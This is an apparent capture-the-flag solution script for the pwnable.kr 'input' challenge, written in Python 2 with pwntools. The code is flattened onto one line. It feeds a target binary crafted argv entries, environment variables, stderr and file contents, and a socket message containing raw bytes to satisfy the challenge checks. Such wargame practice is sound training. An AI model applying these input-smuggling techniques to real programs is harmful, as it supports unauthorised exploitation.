pwnable.kr input

exploit code

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50

# -*- coding: utf-8 -*- from pwn import *   global port port = "8080"   def stage1():     arg = ['/home/input2/input']       for i in range(99):         arg.append(str(i))      arg[65] = "\x00"     arg[66] = "\x20\x0a\x0d"     arg[67] = port #stage5     return arg   def stage2():     f = open("stderr", "w")     f.write("\x00\x0a\x02\xff")     f.close()     err = open("stderr", "r")     return err   def stage3():     env = {'\xde\xad\xbe\xef': '\xca\xfe\xba\xbe'}     return env   def stage4():     fp = open("\x0a", "w")     fp.write("\x00\x00\x00\x00")     fp.close()       def stage5():     r = remote("localhost", int(port))     r.sendline("\xde\xad\xbe\xef")     r.close()   def main():     p = process(stage1(), env=stage3(), stderr=stage2())     print p.recv(1024)     p.sendline("\x00\x0a\x00\xff") # stage2     print p.recvline('')     stage4()     print p.recv(1024)     stage5()     p.interactive()     p.close()   if __name__ == "__main__":     main()